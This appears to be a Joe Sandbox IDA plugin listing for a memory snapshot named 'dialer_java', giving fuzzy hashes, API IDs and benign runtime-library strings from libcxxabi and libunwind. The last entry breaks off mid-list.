                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CCG
                                      • API String ID: 0-1584390748
                                      • Opcode ID: bca2953d2b6e64a94037ce9de8f585ddac2b29dba40fb9bb50120e72cae4939b
                                      • Instruction ID: 67c7e7252017719a681edbc30ee291e76494581651f6fa41d6cf6fbf0242e208
                                      • Opcode Fuzzy Hash: bca2953d2b6e64a94037ce9de8f585ddac2b29dba40fb9bb50120e72cae4939b
                                      • Instruction Fuzzy Hash: BE210623F1E14242FA74461C99973B93983AFA5B60F148571CD4EE73C9CDAFA8C1924B
                                      APIs
                                      Strings
                                      • starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6E3A71E55
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A71E5C
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: mallocstrlen
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
                                      • API String ID: 770973918-3503049562
                                      • Opcode ID: 7ad9bc6fb11ea0c1023f7e788617ed7f8260cd34674b678aa8a858bf99d7ee5a
                                      • Instruction ID: e88a03b064371361e64b89dfb074961bee4efdc60e0596c49bb4c695dd1dc628
                                      • Opcode Fuzzy Hash: 7ad9bc6fb11ea0c1023f7e788617ed7f8260cd34674b678aa8a858bf99d7ee5a
                                      • Instruction Fuzzy Hash: AF31D133B2978186EA15CB18D4453A83BA8EB45B45F054235DE5C9B3E1EE3DE6C68305
                                      APIs
                                      Strings
                                      • starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6E3A71E55
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A71E5C
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc$_assertstrlen
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
                                      • API String ID: 3012236610-3503049562
                                      • Opcode ID: 80f2192df68dbc29744cb51aa87aac9d3ce2de7a8ecce5c615236e9c91d40759
                                      • Instruction ID: 080640b5df560535bb1d6245d99760d8dbf303a1741d4a7bf8baeba767b41607
                                      • Opcode Fuzzy Hash: 80f2192df68dbc29744cb51aa87aac9d3ce2de7a8ecce5c615236e9c91d40759
                                      • Instruction Fuzzy Hash: D521F33331578189EB55CB1CE4497A93BA8EB05B80F440236EE5C9B7A1DE3DE586C319
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: [enable$_if:
                                      • API String ID: 471065373-3342140569
                                      • Opcode ID: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
                                      • Instruction ID: e86d9378ed1dd36926dc6857ffd77f6d3a0413dcba4eb950e341d58004d9b350
                                      • Opcode Fuzzy Hash: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
                                      • Instruction Fuzzy Hash: 47114CF3B06B8682DA189F0AF85536DA765EB54BC0F50C531CB4E577A5EE3DE4818304
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fflushgetenv
                                      • String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_reg(cursor=%p, regNum=%d, &value=%p)
                                      • API String ID: 1137233558-3294674404
                                      • Opcode ID: 9cb7dbdd395e0dc0e117b359f92bc1a8fce241447a1837db2b0fbb34ec30046f
                                      • Instruction ID: 5c571603b72e18a9a296df376b4cff9f48bc516c01dba1ad1f4264c531b9fae7
                                      • Opcode Fuzzy Hash: 9cb7dbdd395e0dc0e117b359f92bc1a8fce241447a1837db2b0fbb34ec30046f
                                      • Instruction Fuzzy Hash: 2A11E627F1964641F7148B2EE8563783E98AFA6B84F040035CD4DE33A1DE3E9886C30A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: memcpyrealloc
                                      • String ID: false$true
                                      • API String ID: 2500458235-2658103896
                                      • Opcode ID: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
                                      • Instruction ID: 3384f904c1888d6774cb34d4cee90b93cdcd6abd650d870a3b33c998015895be
                                      • Opcode Fuzzy Hash: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
                                      • Instruction Fuzzy Hash: AB01D8E3F05A8642EB189B19E9953BD6B51AF447C0F448431CA5C57696EE2DD4C18305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fflushgetenv
                                      • String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_proc_name(cursor=%p, &buf=%p, bufLen=%lu)
                                      • API String ID: 1137233558-3584756005
                                      • Opcode ID: ddb072e9844bd1fc43088026deb61ec753b8945efa0d84c694245139cab19971
                                      • Instruction ID: daa436bb74ccb0abf79e80714ef3fc82c6cb9f2d77b27bb2232f6caf13aafee6
                                      • Opcode Fuzzy Hash: ddb072e9844bd1fc43088026deb61ec753b8945efa0d84c694245139cab19971
                                      • Instruction Fuzzy Hash: 2F11C213B1968642FB008B2AAC063B53F846F66BD4F04013ADC4EB73A1DD3E9582830A
                                      APIs
                                        • Part of subcall function 00007FF6E3A68C00: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF6E3A64D18,?,?,?,00007FF6E3A62E71,?,?,00007FF6E3B8CC48,00000000,00007FF6E3A61609), ref: 00007FF6E3A68C11
                                      • FlsGetValue.KERNEL32(?,?,?,00007FF6E3A62E71,?,?,00007FF6E3B8CC48,00000000,00007FF6E3A61609,?,?,?,?,00007FF6E3A61315), ref: 00007FF6E3A64D22
                                        • Part of subcall function 00007FF6E3A68C90: FlsSetValue.KERNEL32(?,?,?,?,00007FF6E3A64E16), ref: 00007FF6E3A68C94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: OnceValue$ExecuteInitcallocmemset
                                      • String ID: cannot allocate __cxa_eh_globals$execute once failure in __cxa_get_globals_fast()$std::__libcpp_tls_set failure in __cxa_get_globals()
                                      • API String ID: 2044551959-1509371760
                                      • Opcode ID: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
                                      • Instruction ID: b18a2819d8dd214c79bd0270eecbb3ce3569fd339beeea06a789876b6e904ba3
                                      • Opcode Fuzzy Hash: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
                                      • Instruction Fuzzy Hash: 46014F22F3960781FB54A71DA8573B43A845F90380F410939D90DE62E3FE2FB8D1830A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fflushgetenv
                                      • String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_proc_info(cursor=%p, &info=%p)
                                      • API String ID: 1137233558-1935908800
                                      • Opcode ID: e8ba0983abbb9daa666b015af6d5d3ea47504ba357e157cfbd2d07a602640b6c
                                      • Instruction ID: 608e09e3c667565117b079cb3459624a48ce04dfae6f725b34f49007963ede02
                                      • Opcode Fuzzy Hash: e8ba0983abbb9daa666b015af6d5d3ea47504ba357e157cfbd2d07a602640b6c
                                      • Instruction Fuzzy Hash: DE018412F2969241FB14571EE9073753E989F56BD0F04403AC94EB73E1DE2EA5C2830A
                                      APIs
                                      Strings
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp, xrefs: 00007FF6E3A619FB
                                      • (base != 0) && "DW_EH_PE_datarel is invalid with a base of 0", xrefs: 00007FF6E3A619F4
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: _assertabort
                                      • String ID: (base != 0) && "DW_EH_PE_datarel is invalid with a base of 0"$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp
                                      • API String ID: 1072228434-1306384422
                                      • Opcode ID: 55f8dda17198795800073456670580f640aef58b898c353accad96664cddbd08
                                      • Instruction ID: cd983471cd4d6050d9183415dc4265db081cc9f6af8c146605451321650d695f
                                      • Opcode Fuzzy Hash: 55f8dda17198795800073456670580f640aef58b898c353accad96664cddbd08
                                      • Instruction Fuzzy Hash: A9011223F29A5640FEB6875CE5477782E845F54390F490836CE1EF2281EE3FA8C5820A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: _assertmemcpyrealloc
                                      • String ID: basi$basic_istream
                                      • API String ID: 2326172077-1189760207
                                      • Opcode ID: f31d0bfda383c1b6082b963be46f988af25024c433917d3f22b798f058380b77
                                      • Instruction ID: 6fd06faa17f09e1ccfcf9d8f6a9ca4a1b145a04f24faac3c36c7abdf0bbafed2
                                      • Opcode Fuzzy Hash: f31d0bfda383c1b6082b963be46f988af25024c433917d3f22b798f058380b77
                                      • Instruction Fuzzy Hash: CA01DFE3F0664283EA688B0AF681779AB91EB247C4F408030CA5D97A85EF2DE5C08305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: _assertmemcpyrealloc
                                      • String ID: basi$basic_iostream
                                      • API String ID: 2326172077-3201662033
                                      • Opcode ID: 1823fbeb78b408ddb3383061037edbd1725e6bbaf58f914d64ac0c32d595fd86
                                      • Instruction ID: 8d0a32609a110e324a5e0aefa4ad7ca6fb757bb8d1c1b4f26a9f14636e7df356
                                      • Opcode Fuzzy Hash: 1823fbeb78b408ddb3383061037edbd1725e6bbaf58f914d64ac0c32d595fd86
                                      • Instruction Fuzzy Hash: 20F0A2F3B0275283EA648B09F685769AB91EB647C4F448030CB5D57B85EF2DD5D08305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fflushgetenv
                                      • String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_resume(cursor=%p)
                                      • API String ID: 1137233558-227906034
                                      • Opcode ID: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
                                      • Instruction ID: e2f168253bf180122d0dc237ff5f9e3527f5de8d600965d1fab17c52087c5847
                                      • Opcode Fuzzy Hash: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
                                      • Instruction Fuzzy Hash: D1011E13F1A69741FB14571EB81A3783E985F66B80F054436C94EB33A1DD1E6586830B
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fflushgetenv
                                      • String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_step(cursor=%p)
                                      • API String ID: 1137233558-3760164396
                                      • Opcode ID: acbbefe464539abcaef1fe244cec8c422293ae8429e0ab9e7db6b12012d7a983
                                      • Instruction ID: 2f21292b334f6489d2f1246af0ff6dec6df1df2cba9906345962fd24e3017cfe
                                      • Opcode Fuzzy Hash: acbbefe464539abcaef1fe244cec8c422293ae8429e0ab9e7db6b12012d7a983
                                      • Instruction Fuzzy Hash: BD018402F1D29641F7049B1EE8073B43E985F66BD0F04403AC94EB3391DD6E64C2830B
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: ExceptionRaisefflush
                                      • String ID: CCG $libunwind: _Unwind_RaiseException(ex_obj=%p)
                                      • API String ID: 3404444629-1152080672
                                      • Opcode ID: ce7a8e6c7a6e572c481f42ceb0385a3df82124a6507f1b87121b6176e540b98d
                                      • Instruction ID: 9d0e213918cccc13cb8dffc831a78c711de4546ab1db506f21860036dbc068a9
                                      • Opcode Fuzzy Hash: ce7a8e6c7a6e572c481f42ceb0385a3df82124a6507f1b87121b6176e540b98d
                                      • Instruction Fuzzy Hash: B9F02811F1869142F624AB6EB5063F46775AF847C1F004135EE4D63791EE2F96C28305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: _localtime64_s$msvcrt.dll
                                      • API String ID: 1646373207-3474473506
                                      • Opcode ID: e6433b476ba74e81b9775fec21bde56a003506d6abc8a6f67e439d4aff4a0d78
                                      • Instruction ID: d269f188a5653826cb3e2184c4525615ede228f3f6ce11ac4faadc592d097a0b
                                      • Opcode Fuzzy Hash: e6433b476ba74e81b9775fec21bde56a003506d6abc8a6f67e439d4aff4a0d78
                                      • Instruction Fuzzy Hash: 8FF03A62B0AA4290EE05CF0EFC5A2B03B61AF54BC1F404476DC4DA3360EE2FA5C98306
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
